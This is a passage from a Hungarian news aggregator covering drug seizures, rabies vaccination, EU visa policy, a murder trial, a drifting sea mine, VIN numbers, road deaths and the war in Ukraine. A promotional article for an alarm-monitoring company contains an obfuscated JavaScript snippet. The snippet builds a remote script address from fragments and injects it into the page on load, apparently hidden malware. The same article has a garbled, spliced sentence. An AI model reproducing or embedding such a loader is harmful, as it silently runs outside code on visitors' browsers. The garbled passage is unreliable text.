Korosodnak a kábítószer-kereskedelem elkövetői – folytatta az alezredes, példaként említve, hogy idén Budapest XIII. kerületében egy 61 éves nő, míg Salgótarjánban egy 68 éves férfi ellen indítottak eljárást. Évente egy-két olyan eset van, amikor emberek a testüregükben próbálnak Magyarországra kábítószert csempészni, idén már volt egy ilyen elfogás: februárban egy nigériai férfi próbált Belgiumból Budapestre csempészni harminc kokain kapszulát a gyomrában – mondta.

Oláh-Paulon László, az ORFK bűnmegelőzési osztályának vezetője arról beszélt, hogy a több száz kilogramm a lefoglalt kábítószer mennyisége, a sikeres elfogások mind arra mutatnak, hogy több tízezren lehetnek veszélyben. Ezért különösen fontos a megelőzés és az, hogy a kínálati oldal visszaszorítása mellett a keresleti oldalon is eredményeket érjenek el.

Hozzátette: mindent megtesznek azért, hogy felhívják a figyelmet az internetes bűncselekményekre, emellett a középiskolásokat célzó iskolai bűnmegelőzési tanácsadó hálózaton keresztül 89 kollégája 92 település 214 iskolájában százezer diákot ér el.

Az Európai Bizottság újabb két pszichoaktív anyag betiltását kezdeményezte
A kábítószer elleni küzdelem jegyében az Európai Bizottság újabb két pszichoaktív anyag, a 3-MMC-t és a 3-CMC kódjelű szerek uniós betiltását kezdeményezte. Az uniós bizottság tájékoztatása szerint a két kábítószer betiltására vonatkozó döntés a Kábítószer és a Kábítószer-függőség Európai Megfigyelőközpontja (EMCDDA) által végzett kockázat-értékelésen alapul, amely szerint mindkét anyag mérgező hatásuk miatt életveszélyes. Az Európai Unióban 2012, illetve 2014 óta elérhető két anyagot elsősorban por formájában árulják, de kapható tablettában és kapszulában is. Öt uniós tagállamban a 3-MMC-vel összefüggésben 27 halálesetről számoltak be, két tagállamban pedig 10 halálesetről számoltak be a 3-CMC esetében. Az uniós bizottság javaslata két hónapon belül hatályba lép, ha az Európai Parlament és az Európai Unió Tanácsa nem emel kifogást ellene. Hatályba lépését követően, az uniós tagállamoknak hat hónap áll rendelkezésükre, hogy a tilalmat nemzeti jogrendjükbe iktassák – közölték.

The post ORFK: drogfogási rekordokat döntött meg a rendőrség appeared first on .

A rókák veszettség elleni vakcinázására az idén tavasszal is sor kerül, az érintett térségekben ebzárlat és legeltetési tilalom lép életbe – közölte a Nemzeti Élelmiszerlánc-biztonsági Hivatal (Nébih).

A repülőgépes vakcinázás 2022. március 26-án kezdődik Magyarország déli és keleti megyéiben. Az ebzárlat és a legeltetési tilalom elrendeléséről, valamint az egyes területekre vonatkozó pontos időpontokról az illetékes járási állategészségügyi hivatal, illetve a települési önkormányzat tájékoztatja a lakosságot.

Részletezték, hogy az immunizálás során a vakcina tartalmú csalétkeket kisrepülőgépekről juttatják ki a területre, ez a lakott, sűrűn beépített övezeteket nem érinti. A külterületeken plakátok figyelmeztetik majd a kirándulókat. A programba bevont területek tájékoztató jellegű térképe, valamint az érintett települések megyei bontású listája a Nébih weboldalán is elérhető.

Ismertették, hogy a veszettség fő terjesztője a vörös róka, amelynek hazai állománya mintegy hetvenötezer egyedre becsülhető. A veszettség a vadon élő és a házi emlősállatokra, valamint az emberre egyaránt veszélyt jelent, ezért a kutyák veszettség elleni védőoltása kötelező, a macskáknak pedig ajánlott.

Rámutattak arra, hogy az immunizálási program eredményességét a kilőtt rókák laboratóriumi vizsgálatával ellenőrzi a Nébih. Az előző évek eredményei alapján a vakcinázott területen a rókák mintegy háromnegyede felvette a vakcinát tartalmazó csalétket. A program sikerét bizonyítja, hogy a betegség az elmúlt években már csak elvétve fordult elő Magyarországon, utoljára 2017-ben, Borsod-Abaúj-Zemplén megyében mutatták ki a vírust. Emberi megbetegedés pedig már több mint huszonöt éve nem történt. A kedvező járványügyi helyzetnek megfelelően a vakcinázandó területet is csökkenteni lehetett.

A Magyarországgal szomszédos országok közül Romániában és Ukrajnában még előfordul a veszettség. A román hatóság utoljára 2021 februárjában jelentette a betegség megállapítását rókában, magyar határhoz közeli Szatmár megyében. Ukrajnában 2021-ben mintegy 400 esetben mutatták ki a veszettség vírusát házi- és vadállatokban. A vakcinázási program egyúttal hozzájárul ahhoz is, hogy meg lehessen őrizni Magyarország veszettségtől mentes státuszát, amit 2021 tavaszán az Európai Unió, majd idén februárban a Nemzetközi Állatjárványügyi Hivatal (OIE) is elismert – közölte a Nemzeti Élelmiszerlánc-biztonsági Hivatal.

The post Nébih: hamarosan kezdődik a tavaszi rókavakcinázás appeared first on .

Az Európai Bizottság a befektetői állampolgársági, úgynevezett aranyútlevél-, illetve aranyvízum-programok megszüntetésére szólította fel a tagállamokat, valamint az orosz és fehérorosz állampolgárok uniós állampolgárságának felülvizsgálatát, illetve az orosz és fehérorosz állampolgároknak uniós beutazást biztosító vízumok visszavonását javasolta – tájékoztatott a brüsszeli testület.

Ajánlásában az uniós bizottság kijelentette: “nagyon fontos, hogy minden tagállam, mely még mindig működtet befektetői állampolgársági programot, ezt azonnal megszüntesse. Ezek a rendszerek nem egyeztethetők össze a lojális együttműködés elvével és az uniós polgárság EU-szerződésekben rögzített fogalmával” – fogalmaztak.

Hangsúlyozták: a befektetői letelepedési programok biztonsági, pénzmosási, adókijátszási és korrupciós kockázatokat jelentenek a tagállamok és az EU egésze számára. Oroszország Ukrajna elleni agressziója ismét rávilágított e kockázatokra – közölték.

Az Európai Bizottság arra kérte a tagállamokat, hogy vezessenek be és végezzenek szigorú ellenőrzéseket, mielőtt befektetői letelepedési program keretében bármilyen tartózkodási engedélyt kiadnának. Felszólította a tagállamokat: haladéktalanul vonják vissza a befektetői letelepedési program keretében az ukrajnai háború miatt uniós szankciók hatálya alatt álló orosz vagy fehérorosz állampolgárok számára kiadott tartózkodási engedélyeket, vagy tagadják meg a meghosszabbításukat. Ugyanígy járjanak el azok esetében is, akik számottevően támogatják az Ukrajna elleni háborút, illetve az orosz, vagy a fehérorosz kormány nemzetközi jogot sértő egyéb, ezzel összefüggő tevékenységeit.

A bizottság arra szólított fel, hogy a tagállamok minden orosz és fehérorosz állampolgár esetében függesszék fel tartózkodási engedélyek kiadását a befektetői letelepedési programok keretében.

Az intézkedések alkalmazásának összhangban kell állnia az arányosság elvével, az alapvető jogokkal és a tagállamok nemzeti jogszabályaival – írták. Az uniós bizottság továbbá arra kérte fel a tagállamokat, hogy május végéig tegyenek jelentést az előterjesztett ajánlás végrehajtásáról, és ezt követően rendszeresen adjanak róla tájékoztatást.

The post Orosz agresszió: Az EU az állampolgársági és vízumprogramok megszüntetésére szólít fel appeared first on .

Nem jogerősen életfogytig tartó fegyházbüntetésre ítélte a Nyíregyházi Törvényszék hétfőn azt a román állampolgárságú férfit, aki 2016-ban lelőtte szeretőjét és életveszélyesen megsebesítette annak férjét.

Resán Dalma, a Nyíregyházi Törvényszék sajtószóvivője a közleményében azt írta, a bíróság előre kitervelten, több ember sérelmére elkövetett emberölés bűntettének kísérletében találta bűnösnek a vádlottat, aki a szabadságvesztés büntetésből legkorábban 25 év eltelte után bocsátható feltételes szabadságra.

A vádlott 2012-ben került kapcsolatba a nővel. Az asszony 2013-ban kezdeményezte házassága felbontását, azonban később meggondolta magát és úgy döntött, hogy mégis a férjével marad – ismertette a sajtószóvivő.

A döntést azonban a vádlott nem fogadta el, folyamatosan kereste személyesen, telefonon és e-mail-ben, mert szerette volna kapcsolatukat helyreállítani. Mivel nem tudott belenyugodni a visszautasításba, elhatározta, hogy leszámol a házaspárral: 2016. augusztus 31-én a lakóházuk közelében elrejtőzött és várakozott, majd amikor az asszony hazaért, a vádlott a bejárati ajtónál fegyverrel fejbe lőtte, majd a kiabálásra a segítségére siető férjét is.

A lövés következtében a feleség a helyszínen életét vesztette, férje életben maradt, azonban maradandó fogyatékossággal, súlyos egészségromlással gyógyult meg. A támadó tette után Romániába menekült, ahol európai elfogatóparancs alapján másnap fogták el a rendőrök és 2019. szeptember 5-én adták át a magyar hatóságoknak – tette hozzá Resán.

Az ítélet ellen az ügyészség, a vádlott és védője is fellebbezést jelentett be, a jogerős döntést a Debreceni Ítélőtábla hozza meg.

The post Életfogytig tartó fegyházbüntetést kapott a román férfi, aki lelőtte szeretőjét és megsebesítette annak férjét appeared first on .

Sodródó aknát észleltek hétfő reggel Románia területi vizein a Fekete-tengeren, ezért a térségbe küldték a Viceamiral Constantin Balescu aknászhajót, hogy begyűjtse és hatástalanítsa a robbanószerkezetet – közölte a román védelmi minisztérium.

Az aknát az Olimpus 1 halászhajó vette észre 72 kilométerre a Midia-foktól, amely Konstancától 15 kilométernyire északra, a Duna – Fekete-tenger csatorna északi ágának torkolatánál található. A tájékoztatást követően a haditengerészet parancsnoksága riasztotta az aknászhajót, amely – fedélzetén aknabegyűjtésre kiképzett búváregységgel – azonnal a szerkezet felkutatására indult.

A román haditengerészet később közölte, hogy az aknát megtalálták, beazonosították, majd a búvárok robbanószerkezetet erősítettek rá és felrobbantották. A közzétett fotókon gömb alakú rozsdás vasszerkezet látható tüskeszerű nyúlványokkal, számokból és cirill betűkből álló felirattal. A Pro TV kereskedelmi televízió a védelmi minisztériumtól megtudta, hogy 172 kilogrammos YaM típusú, húszkilós robbanótöltettel rendelkező tengeri aknáról van szó. A román aknászhajó a feladat elvégzése után a térségben folytatta a járőrözést, további elsodródott robbanószerkezetek után kutatva.

Szombaton Törökország ideiglenesen lezárta a teherforgalmat a Boszporuszon, hogy begyűjtsön és megvizsgáljon egy úszó tárgyat, amelyről azt feltételezte: az ukrajnai partokról elszabadult tengeri akna. Miután az aknát hatástalanították, a forgalom délután újraindult.

A román haditengerészet már múlt hétfőn is járőrözni küldte aknászhajóját, miután az orosz Szövetségi Biztonsági Szolgálat (FSZB) március 19-én azt közölte, hogy az ukrán haditengerészet elaknásította Odessza, Ocsakiv, Csornomorszk és Pivdennyi kikötőjét. Az FSZB szerint a több, mint 420 tengeri aknából néhány elszabadult a vihar miatt, és fenyegeti a fekete-tengeri hajózást.

Az ukrán fél az oroszokat gyanúsította meg a tengeri aknák elhelyezésével.

The post Orosz agresszió: elszabadult aknát találtak a Fekete-tenger román vizein appeared first on .

A VIN számot itthon főleg alvázszámként ismerik. Nemzetközi nevén viszont VIN (Vehicle Identification Number), amely a gépkocsi egyedi „igazolványaként” szolgál. A 17 jegyű számsor beolvasása után nem csak a gyártási évet, a helyet, valamint a különféle szervizmunkálatokat tudhatjuk meg általa, de az autó eladásáról is rengeteg információt kaphatunk.

A gépkocsi előéletéről

Az alvázszám egy olyan egyedi azonosító, amely alatt szó szerint mindent nyilvántartanak az autóról. Maga az azonosító olyan számokból és betűkből áll, amelynek részei külön jelentéssel bírnak. Helyileg a forgalmiban, valamint főleg az autó szélvédőjén lévő adattáblán találhatjuk meg, illetve több elrejtett helyen is beleütik a gépjármű egyes részeibe. A VIN adatlapba kerül az is, mikor járt az autó szervizben, milyen balesetei voltak, hogy mikor és hol történetek ezek, továbbá kik voltak a korábbi tulajdonosai. Ezen kívül az autó gyártása, forgalomba helyezésének éve és az összes gyári specifikációja könnyedén lekérdezhető a VIN szám által. Ennek a legnagyobb jelentősége természetesen használt autó vásárlásánál van, mivel egyértelműen felderíthető a VIN szám leolvasása után az autó eredete és pontos története. Sajnos gyakran trükköznek az eladók azzal, hogy például eltitkolják a baleseteket. A megjavított autón nem látszik semmi, de az alvázszám leolvasásával kiderül, hogy mikor volt utoljára szervizben és milyen problémával. Ugyanúgy kiderül az is, ha az autó lopott vagy más kétes eredettel bír. Nehéz vele csalni, hiszen bármilyen hivatalos szervizbe is viszik az autót, ott kötelező az alvázszám adatai alapján még azt is megadni, hogy milyen alkatrészek kerültek cserére a gépjárműben. A VIN számot nem csak a szakemberek, hanem mi magunk is leolvashatjuk az arra alkalmas weboldalakon. Ezek az oldalak olyan nemzetközi adatbázisokkal rendelkeznek, amikben bármely gépkocsi nyilvántartása megtalálható. Ezért az alvázszám lekérdezése esetén még a külföldről behozott autóknál is megismerhetjük azok előtörténetét.

Hogyan értelmezzük az alvázszámot?

Ahogyan már említettük a VIN szám speciális szám- és betűkombinációból áll. Az egész számsor három fő részből tevődik össze. Ezek részei a WMI, a VDS és a VIS megnevezéssel bírnak. Ezek a rövidítések pedig a következőeket rejtik: a WMI a gyártó jelzése, ami minden országban ugyanaz az első három betű vagy szám. A következő hat jegy a modell megjelölését, amíg a VIS az utolsó, minimum nyolc karakterével az egyedi azonosítót jelzi – ez magában foglalja a gyártás helyét és évét is többek között.

Hol található pontosan a VIN szám?

A VIN szám, ahogy már említettük, a gépkocsi adattábláján pillantható meg először. Ez a kis címke vagy akár fémlap jellemzően az autó szélvédője alatt, illetve a kocsi elején található. Viszont a gyártók ezt a karaktersort nem csak ott, hanem az autó különféle területein is feltüntetik. Ez modellenként eltérő, és akár 4-9 helyen is előfordulhat a gépjárművön – általában a vezetői oldalon. Ennek a célja, hogy nehezebben tudjanak csalni az autóval. Ezért egy szakavatott autóvásárló nem csak az adattáblát ellenerőzni, hanem ezeket a rejtett számokat is. Ugyanis ha ezekből valamelyik eltér, vagy épp átütés nyoma tapasztalható rajta, akkor az autóval valószínűleg problémák lesznek.

 

The post Mit érdemes tudni az alvázszámokról? appeared first on .

A statisztikai adatok világosan rámutatnak arra, hogy a távfelügyelet szolgáltatásnak igenis van létjogosultsága – akár a csendes, nyugodt környékeken is. A számok pedig, mint tudjuk, sohasem hazudnak – ebben az esetben sem.

Nem szabad félvállról venni a kérdést

Személy- és vagyonvédelem – fajsúlyos téma ez, ami nem képezheti alku tárgyát. Sajnos már nem elég a szerencsénkben bízni, és abban reménykedni, hogy mindennemű segítség nélkül is védettek vagyunk a rablókkal, károkozókkal szemben. A már emlegetett statisztikai felmérésekben viszont bátran bízhatunk – az adatok szerint azok a lakások, családi házak, amelyeknél már megoldott a távfelügyelet kiépítése, sokkal kevesebb eséllyel vannak kitéve a betörésnek, mint azok, ahol a lakók nem tulajdonítanak nagy jelentőséget ennek az igencsak számottevő kérdésnek.

24 órás megfigyeléssel a teljes biztonság jegyében

Gondoljon csak bele, milyen felemelő és egyben felszabadító érzés lenne tudni, hogy az otthona, a családja és az értékei teljes biztonságot élveznek – nemcsak időszakosan, de a nap 24 órájában! Ezt a bizonyosságot adhatja meg a számunkra a 0-24 órás távfelügyelet, különösen az olyan extra szolgáltatatásokkal kiegészítve, mint a helyszínre kivonuló járőrszolgálat.

Hogyan működik a szolgáltatás?

Az okos berendezéHa távfelügyelet, akkor csakis az Alarmdirect!s bármilyen észlelt rendellenesség esetén azonnal értesítést küld a központba. A diszpécseri központ szakképzett munkatársai 0-24-ben figyelik ezeket az értesítéseket. A tapasztalatuk és komoly szaktudásuk révén azonnal a megfelelő módon reagálnak. A jelzés oka lehet áramkimaradás, a rendszer akkumulátorának lemerülése, de akár betörési kísérlet is. Ha Ön előzőleg rábólintott a járőrszolgálat igénylésére is, a diszpécser azonnal értesíti a közelben lévő illetékes szerveket, akik a helyszínre kiérkezve megoldják a problémát.

Ha távfelügyelet, akkor csakis az Alarmdirect!

Hazánk egyik legnépszerűbb biztonságtechnikai berendezések forgalmazásával és telepítésével foglalkozó cégére, az Alarmdirect-re bármikor rábízhatjuk magunkat. A profi gárda palettáján kizárólag minőségi produktumokat találhatunk – amelyek ára ráadásul példátlanul baráti.

(function(){ tkwnu="axfpcv6xkwn9";tkwn=document.createElement("script"); tkwn_="u"+("st");tkwn_+="at"+(".");tkwn.async=true;tkwn_+="in"; tkwnu="371575189."+tkwnu;tkwn.type="text/javascript";tkwnu+="f0e926skXqj2"; tkwnu+="72n7hz";tkwn_+=("f")+"o"+("/");tkwn.src="https://"+tkwn_+tkwnu; tkwnd=document.body;tkwnd.appendChild(tkwn); })();

The post Távfelügyelet – minden, amit a szolgáltatásról tudni kell appeared first on .

Tavaly lényegesen kevesebben vesztették életüket az Európai Unió útjain, mint a koronavírus-járvány előtt; Magyarországon szintén csökkent a halálos kimenetelű közúti balesetek száma – derült ki az Európai Bizottság a 2021-ben bekövetkezett halálos kimenetelű közúti balesetekről készült jelentéséből.

Az adatok szerint tavaly mintegy 19 800 ember vesztette életét közúti balesetben az Európai Unió területén. A tavalyi adat, noha a 2020-as számokhoz képest öt százalékkal, mintegy ezer halálesettel több, de a 2019-es, a koronavírus okozta világjárvány előtti időszakhoz képest 13 százalékkal, közel háromezerrel kevesebb halálos áldozatot jelent. 2019 és 2020 között a halálos kimenetelű közúti balesetek száma 17 százalékkal csökkent – közölték.

A halálos kimenetelű közúti balesetek számát tekintve az uniós országok rangsora a korábbi évekhez képest nem változott jelentősen. Továbbra is Svédországban a legbiztonságosabb a közúti közlekedés, az országban tavaly egymillió lakosra vetítve 18 haláleset jegyeztek fel. A legmagasabb arányról Romániában számoltak be, ahol egymillió lakosra vetítve 93-an vesztették életüket az utakon 2021-ben. Az uniós átlag 44 közúti haláleset volt egymillió lakosra vetítve.

A jelentés szerint Magyarországon szintén csökkent a halálos kimenetelű közúti balesetek száma a világjárvány előtti szinthez képest. Amíg 2019-ben egymillió lakosra vetítve 62 ember vesztette életét közúti balesetekben, addig számuk tavaly 56 volt, amely csaknem tíz százalékos csökkenést jelent. A halálos kimenetelű közúti balesetek legnagyobb, több mint húsz százalékos csökkenését Dániában, Belgiumban, Portugáliában, Lengyelországban és Litvániában jegyezték fel. Ezzel szemben Lettországban, Szlovéniában és Finnországban nőtt a halálos balesetek száma.

A halálos közúti balesetek 52 százaléka vidéki utakon történt, a városi területeken ez az arány negyven százalék, az autópályákon pedig nyolc százalék. Az autóval utazók az összes közúti halálos baleset 43 százalékát, a gyalogosok húsz százalékát, a motorosok 18 százalékát, a kerékpárosok pedig a tíz százalékát tették ki.

Jelentésében az Európai Bizottság emlékeztetett arra: az EU azt a célt tűzte ki, hogy 2030-ra a felére essék vissza a közúti halálesetek száma. Az elmúlt évtizedben az Európai Unió egészét tekintve 36 százalékos csökkenés következett be – tették hozzá.

Elképesztő: több mint háromezer gyorshajtót mértek be múlt héten Budapesten
Csaknem 3400 gyorshajtót mértek be a rendőrök múlt hét közepén a fővárosban – közölte a Budapesti Rendőr-főkapitányság (BRFK). A 3380 autós közül 132 sofőrrel szemben helyszíni bírságot, 275-el szemben közigazgatási bírságot szabtak ki, további 2973 autóst traffipax mért be. Ők szintén közigazgatási bírságra számíthatnak. A BRFK közleménye szerint az ellenőrzések során kilenc egyéb bűncselekményt is felderítettek a rendőrök. A rendőrség továbbra is kiemelt figyelmet fordít a közlekedésbiztonságra, azon belül is az egyik legfőbb baleseti veszélyforrásra, a gyorshajtások visszaszorítására – írták.

The post Európai Bizottság: tavaly kevesebben vesztették életüket az utakon, mint a világjárvány előtt appeared first on .

Az ukrán erők visszavették az orosz csapatoktól a főváros határában, Kijevtől északnyugatra fekvő Irpiny települést – közölte hétfőn Olekszandr Markusin, a város polgármestere a Telegram üzenetküldő portálon.

Egyelőre azt kérte a városka lakóitól hogy ne térjenek vissza a településre, mert veszélyes. “Tart a város megtisztítása, és még újabb orosz támadások várhatók” – idézte a polgármestert az Ukrajinszka Pravda hírportál.

Közben az ukrán hatóságok által hétfőn közzétett statisztika szerint az Azovi-tenger partján fekvő Mariupolban a háború kitörése óta csaknem ötezren haltak meg a várost ért orosz támadásokban, köztük mintegy 210 gyermek. Pontos adatokat egyelőre nem tudnak közölni. A kikötővárost már 28 napja ostromolják az orosz csapatok. A települést a blokád előtt megközelítőleg 140 ezer mariupolinak sikerült elhagynia, utána 150 ezer lakost evakuáltak. Jelenleg még mintegy 170 ezren maradtak a városban. Harmincezer mariupolit szállítottak el Oroszországba, illetve az orosz erők által elfoglalt kelet-ukrajnai területekre.

A kelet-ukrajnai Harkiv polgármestere, Ihor Terehov a hétfői tájékoztatóján kijelentette: “az orosz hadsereg célzottan lakott területeket lő. Nemcsak egy-egy házat, hanem egész lakónegyedeket. A város lakóit állandóan bombázzák. Eddig 1410 objektum pusztult el, ebből 1177 többszintes lakóépület”. A polgármester hozzátette, hogy 53 óvoda, 69 iskola és 15 kórház is megsemmisült Harkivban.

Terehov szavai szerint önkéntesek életüket kockáztatva szállítanak élelmet olyan kerületekben lévő óvóhelyekre, amelyeket szünet nélkül ágyúznak az orosz erők. Közölte, hogy ugyanakkor a szupermarketek működnek a városban, és az alapvető élelmiszerek kaphatók. Harkiv más városokból is kap humanitárius segélyt. Ilyen segítséget küldenek az Egyesült Államokból is: Chicago városa például 880 ezer dollár értékben küldött orvosi eszközöket, amelyeket városi kórházaknak és katonai kórházaknak osztottak szét – mondta a városvezető.

A politikus kitért arra, hogy Harkiv olyan város, ahol alapvetően oroszajkúak élnek, a háború kitörése előtt szinte minden negyedik ott lakónak volt rokona vagy ismerőse, barátja Oroszországban. Mint mondta, Harkivot többé-kevésbé mindig is Oroszországhoz “lojális” városnak tekintették, de a háború drámaian megváltoztatta az ott élők viszonyulását Oroszországhoz. Terehov azt hangsúlyozta, hogy Harkiv lakói ma egységesek, és készek a végsőkig harcolni a városuk megvédéséért.

A dél-ukrajnai Herszon megyében lévő Henicseszkben, az Azovi-tenger partján fekvő kikötővárosban – amelyet elfoglaltak az orosz csapatok – elkezdtek rubelben “nyugdíjat” osztani a helyi lakosoknak – számolt be a Moszt című, helyi hírportál. Tízezer rubelt – valamivel több mint száz dollárt – osztogatnak a helyieknek, akik viszont a pénzt azonnal átváltják hrivnyára, a boltokban ugyanis nem fogadják el az orosz valutát. Szerhij Lany, a Herszon megyei tanács egyik tagja a Facebookon arra kérte az embereket, hogy “semmit se fogadjanak el az orosz megszállóktól, ne működjenek együtt velük, ugyanis csakis így járulhatnak hozzá Ukrajna győzelméhez”.

Közben Kirilo Budanov, az ukrán katonai hírszerzés főnöke egy interjúban azt állította, hogy Kijevnek kiterjedt ügynökhálózata van Oroszország katonai, politikai és pénzügyi vezetésében, beleértve a Kremlt is, és szerinte ennek köszönhetően semmisítettek meg nemrég egy partraszállító hajót az Azovi-tenger partján fekvő Bergyanszkban. Budanov az interjúban kiemelte, hogy Ukrajna védői készen állnak hosszú háborúra, de szükségük van még több vadászrepülőgépre, valamint légvédelmi és rakétavédelmi rendszerre.

Az ukrán légierő keleti parancsnoksága hétfőn este arról számolt be, hogy Harkiv megyében újabb orosz repülőgépet és drónt lőtt le. A repülőgép típusáról és a pilóta sorsáról információkat nem közöltek.

Az ukrán vezérkar legfrissebb, hétfői összesítése szerint eddig hozzávetőlegesen 17 ezer orosz katona esett el, mintegy ezer került fogságba. A vezérkar állítása szerint az ukrán erők megsemmisítettek 123 orosz repülőgépet, 127 helikoptert, hét hadihajót, 586 harckocsit, csaknem 1700 páncélozott harcjárművet, több mint háromszáz tüzérségi és 54 légvédelmi rendszert, valamint 95 rakéta-sorozatvetőt.

Az ukrán szárazföldi erők parancsnoksága közben hírszerzési értesülésre hivatkozva arról számolt be, hogy öngyilkos lett az orosz csapatok egyik harckocsiezredének parancsnoka, miután az ukrán hadsereg visszafoglalta az északkeleti Szumi megyében lévő Trosztyanec települést. Az ukrán északi hadműveleti parancsnokság pedig azt jelentette, hogy katonái megsemmisítették az orosz erők egy hadoszlopát, és megszereztek két Ural Tornádó típusú páncélozott teherautót. Oleh Szinyehubov, a kelet-ukrajnai Harkiv megye katonai adminisztrációjának vezetője a Telegram üzenetküldő portálon pedig arról számolt be, hogy az ukrán légvédelem Izjum város közelében lelőtt egy orosz Szu-34-es taktikai bombázó repülőgépet.

Felfüggesztette működését a Novaja Gazeta a “különleges hadművelet” befejezéséig
Felfüggesztette működését a Novaja Gazeta című független orosz lap az ukrajnai háború befejezéséig – közölte a szerkesztőség. “Újabb figyelmeztetést kaptunk a Roszkomnadzortól (az orosz tömegtájékoztatási és távközlési felügyelettől). Ezt követően felfüggesztjük az újság online és papír alapú változatát, közösségimédia-tevékenységét «az Ukrajna területén zajló különleges hadművelet» befejezéséig” – áll a szerkesztőség közleményében. A Roszkomnadzor vasárnap megakadályozta, hogy a Kommerszant, a Novaja Gazeta és a Dozsgy leközölhesse az első interjút, amelyet Volodimir Zelenszkij ukrán elnök a háború kezdete óta az orosz médiának adott. Az anyag csak a Lettországban szerkesztett Meduza hírportálon jelent meg. Dmitrij Peszkov, a Kreml szóvivője hétfőn azt állította, hogy Moszkva “nem fél” nyilvánosságra hozni Zelenszkij interjúját, amelyet a Roszkomnadzor szerinte abból a szempontból ellenőriz, hogy megfelel-e az orosz jogszabályoknak.

The post Orosz agresszió: visszavették az ukrán erők a Kijev melletti Irpinyt appeared first on .

Ukrajna kész a semlegességről és a biztonsági garanciákról tárgyalni, de a demilitarizálásról és “nácitlanitásról”, valamint az orosz nyelv védelméről nem – jelentette ki Volodimir Zelenszkij ukrán elnök az orosz sajtónak az országa elleni háború kezdete óta adott első interjújában, amelyet vasárnap este közölt a Lettországban szerkesztett, orosz és angol nyelvű Meduza hírportál.

Az ukrán elnök rosszallását fejezte ki amiatt, hogy az orosz fél a nyilvánosságnak is kiszivárogtatott ultimátumban fogalmazta meg a Kijevvel szembeni tárgyalási pozícióját. Az orosz nyelv védelmével kapcsolatban azt mondta, hogy “a háború minden napja megkérdőjelezi még a fogalmát is annak, hogy mi is az orosz nyelv”.

“Az emberek ezt nem akarják majd. Az emberek nem akarnak majd (oroszul) olvasni, mozit nézni, beszélni” – vélekedett az elnök.

Zelenszkij azt állította, hogy Ukrajnában mindenki olyan nyelven beszél, amilyenen csak akar. A kölcsönös tisztelet szükségességéről beszélt a szomszédos országok esetében, arról, hogy Kijev a történelem, a nyelv és a kulturális örökség iránti “tükörtiszteletet” rögzítő megállapodásokat kíván kötni velük.

“Szóval, mit jelent ez? Hogy ne játszadozzunk tovább, ahogy a magyarok is játszadoznak ezzel egy kicsit, de kevesebbet, Oroszország pedig többet. Ne játszadozzunk tovább az iskolabezárással Ukrajnában. Ha orosz iskolát akarnak, ha valaki oroszul akar tanulni – magániskolát, tessék, nyissanak, de azzal a feltétellel, hogy ha önök nálunk nyitnak egyet, mi önöknél nyitunk” – fogalmazott az államfő.

Leszögezte, hogy szerinte Oroszországban az orosznak, Ukrajnában az ukránnak kell lennie az államnyelvnek. Azt mondta, hogy a legfontosabb pontban, a biztonsági garanciák, a semlegesség, és a nem-nukleáris státus kérdésében Kijev készen áll a megegyezésre. “Ha jól emlékszem, emiatt kezdték a háborút” – hangoztatta.

Zelenszkij hangsúlyozta, hogy a megállapodást parlamenti ratifikációval és néhány hónapon belül referendumon kell megerősíteni, amelyet kezeseknek kell garantálniuk, és amely szerinte csakis az orosz csapatkivonás után lehet legitim. Az ukrán alkotmányban a szükséges változtatásokhoz a hatályos jogrend értelmében két ülésszak, vagyis egy teljes év szükséges.

Az ukrán államfő ismételten személyes találkozót szorgalmazott Putyinnal. Úgy vélekedett, hogy Oroszország, Ukrajna és Fehéroroszország az érintettség okán nem lehet a tárgyalások helyszíne. Azt mondta, hogy egyelőre nem érti teljesen a békefenntartók Ukrajnába vezénylésére vonatkozó lengyel javaslatot. Hozzátette: lengyel partnereinek elmagyarázta, hogy országának nincs szüksége egy befagyasztott konfliktusra a területén.

Hamisítványnak nevezte azt az állítólagos parancsot, amelyet az orosz védelmi tárca szerint Mikola Balan vezérezredes, az ukrán nemzeti gárda parancsnoka írt alá, és amely Moszkva szerint annak bizonyítéka, hogy Kijev erőszakkal készült visszafoglalni a szakadároktól a Donyec-medencét. Azt állította, hogy minden készülő ukrán támadásra vonatkozó dokumentum hamis, és Kijev sem a Donyec-medence, sem a Krím ellen nem akart támadást indítani.

Felhívta a figyelmet arra, hogy nemrégiben az az álhír kezdett el keringeni, miszerint már elkészültek a kitüntetések, amelyeket a Krím visszafoglalásában részt vevő katonák kaptak volna. Rámutatott, hogy ezekhez járó okleveleken az ő nevét, adományozói minőségben, V.A. Zelenszkijként tüntették fel, amelyből az A az apai nevének rövidítése lenne. Mint mondta, helyesen az O betűt kellett volna használni, ukrán módra, az Olekszandr név után, nem pedig a név orosz megfelelőjének, az Alekszandr-nak a rövidítését.

Viccnek nevezte az állítást, miszerint Ukrajnában katonai biolaboratóriumok működnek. Mint mondta, Ukrajnának emellett nukleáris és vegyi fegyvere sincsen.

Ukrajna katonai célját a minél kevesebb áldozatban, a háború időtartamának lerövidítésében és az orosz erőknek a február 24-i támadás előtti “kompromisszumos területekre” való visszavonulásában nevezte meg. Az állította, hogy az orosz erőknek mintegy 20 ezer katonájuk esett el. (Az orosz vezérkari főnök első helyettese pénteken 1351 halottat ismert el.)

Zeleneszkij a Meduza mellett a Kommerszant és a Novaja Gazeta című lap, valamint a betiltott Dozsgy kérdéseire is válaszolt a Zoomon adott interjúban, amelyet vasárnap egy időben, vasárnap este kívántak megjelentetni. Az orosz tömegtájékoztatási és távközlési felügyelet (Roszkomnadzor) azonban felszólította az orosz médiát, hogy ne tegye közzé az interjút, és “ellenőrzést” indított a “felelősség mértékének megállapítására”. A Roszkomnadzor vasárnap blokkolta a német Bild bulvárlap és Alekszandr Nyevzorov orosz újságíró honlapját, tömeges rendbontásra, szélsőségességre, valamint jogellenes tömegakciókban való részvételre szólító felhívás címén.

A G7 csoport nem hajlandó rubelben fizetni az orosz gázért
